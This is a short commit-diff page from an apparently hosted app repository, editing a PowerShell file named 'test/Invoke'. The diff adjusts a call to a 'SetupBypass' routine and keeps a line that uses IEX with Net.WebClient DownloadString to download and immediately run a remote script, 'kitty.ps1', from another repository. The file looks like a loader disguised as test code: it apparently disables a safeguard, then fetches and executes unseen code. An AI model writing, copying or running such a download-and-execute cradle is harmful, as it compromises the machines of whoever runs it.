Spaces:
Runtime error
Runtime error
Update test/Invoke
Browse files- test/Invoke +1 -2
test/Invoke
CHANGED
@@ -290,8 +290,7 @@ namespace Test
|
|
290 |
}
|
291 |
}
|
292 |
"@
|
293 |
-
|
294 |
-
IEX -Command ([Test.Program]::SetupBypass())
|
295 |
|
296 |
IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
|
297 |
|
|
|
290 |
}
|
291 |
}
|
292 |
"@
|
293 |
+
[Test.Program]::SetupBypass()
|
|
|
294 |
|
295 |
IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
|
296 |
|